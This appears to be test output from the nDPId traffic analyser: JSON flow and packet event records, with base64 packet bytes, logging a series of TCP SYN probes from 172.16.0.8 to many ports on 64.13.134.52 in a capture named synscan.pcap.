-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1022,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1013,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1013,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsszoAADkGXDisEAAIQA2GNIzTF2PdU4MZAAAAAGACCAAZKQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1023,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1014,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1023,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1014,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsLiYAADEG6UysEAAIQA2GNIzSBvfdUoMYAAAAAGACCAApmAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1024,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1015,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1024,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1015,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsIwgAAC0G+GqsEAAIQA2GNIzSEV3dUoMYAAAAAGACCAAfMgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1025,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1016,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1025,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1016,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsbtYAADYGo5ysEAAIQA2GNIzSCU3dUoMYAAAAAGACDAAjQgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1026,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsggcAADcGj2usEAAIQA2GNIzSsCzdUoMYAAAAAGACEAB4YgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsi00AADgGhSWsEAAIQA2GNIzSG2vdUoMYAAAAAGACBAAZJAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1028,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1019,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1019,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsjTgAADgGgzqsEAAIQA2GNIzSQmDdUoMYAAAAAGACBADyLgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1029,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1020,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1020,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAs2LgAACgGR7qsEAAIQA2GNIzSBJbdUoMYAAAAAGACBAAv+QAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1030,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsKigAACwG8kqsEAAIQA2GNIzSNdbdUoMYAAAAAGACBAD+uAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1031,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAskrkAADsGermsEAAIQA2GNIzSFw7dUoMYAAAAAGACEAARgQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1032,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1023,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1023,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsqEIAACUGezCsEAAIQA2GNIzSJpbdUoMYAAAAAGACCAAJ+QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1033,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1024,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1024,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAswmIAADUGURCsEAAIQA2GNIzSApvdUoMYAAAAAGACCAAt9AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1034,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1025,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1025,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAs2UYAACYGSSysEAAIQA2GNIzSI3jdUoMYAAAAAGACDAAJFwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1035,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1026,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1026,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsOl0AACcG5xWsEAAIQA2GNIzSE+7dUoMYAAAAAGACEAAUoQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1036,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1027,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1036,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1027,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAsSLAAADAGz8KsEAAIQA2GNIzSFvXdUoMYAAAAAGACBAAdmgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1037,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1028,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1037,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1037,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1028,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAsSH8AADcGyPOsEAAIQA2GNIzSBA3dUoMYAAAAAGACEAAkggAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1038,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1029,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1038,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1029,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAsWcgAADcGt6qsEAAIQA2GNIzSFxPdUoMYAAAAAGACEAARfAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1030,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1030,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAs2jgAACwGQjqsEAAIQA2GNIzSANPdUoMYAAAAAGACBAAzvAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1040,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1031,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1040,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1031,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAsdCsAADsGmUesEAAIQA2GNIzSB\/PdUoMYAAAAAGACEAAgnAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1041,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1041,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsb8MAADgGoK+sEAAIQA2GNIzSAJDdUoMYAAAAAGACBAAz\/wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1042,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1033,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1033,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsXXkAADcGs\/msEAAIQA2GNIzSBFjdUoMYAAAAAGACEAAkNwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1043,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1034,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2170,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1043,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1034,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsZeIAADsGp5CsEAAIQA2GNIzSCHrdUoMYAAAAAGACEAAgFQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1044,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1035,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1044,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1035,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsVbcAADIGwLusEAAIQA2GNIzSF9XdUoMYAAAAAGACDAAUugAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1036,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1036,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsFoAAADQG\/fKsEAAIQA2GNIzSAyDdUoMYAAAAAGACBAAxbwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1037,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 